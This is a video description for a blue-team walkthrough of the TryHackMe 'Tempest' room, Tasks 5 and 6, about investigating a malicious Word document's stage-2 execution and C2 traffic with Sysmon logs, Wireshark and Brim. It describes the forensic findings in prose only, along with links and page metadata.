Investigating Microsoft word C2 Malware windows event logs TEMPEST P2 tryhackme hack

CTF Security

description

Tempest Tryhackme room Task 5 & 6

Malicious Document - Stage 2 Based on the initial findings, we discovered that there is a stage 2 execution:

The document has successfully executed an encoded base64 command, decoding this string reveals the exact command chain executed by the malicious document.

Malicious Document Traffic Based on the collected findings, we discovered that the attacker fetched the stage 2 payload remotely:

We discovered the Domain and IP invoked by the malicious document on Sysmon logs. There is another domain and IP used by the stage 2 payload logged from the same data source.

Tempest https://tryhackme.com/room/tempestincident

Part 1 Video https://youtu.be/O5si_kPROh0

Tools Timeline explorer Sysmonview Wireshark Brim

#brim #tryhackme #digitalforensic #wireshark #tempest #dfir #blueteam ... https://www.youtube.com/watch?v=S7YdyfRstYw

created

2024-07-24

staked

0.0 LBC

license

Copyrighted (contact publisher)

File size

252344874 Bytes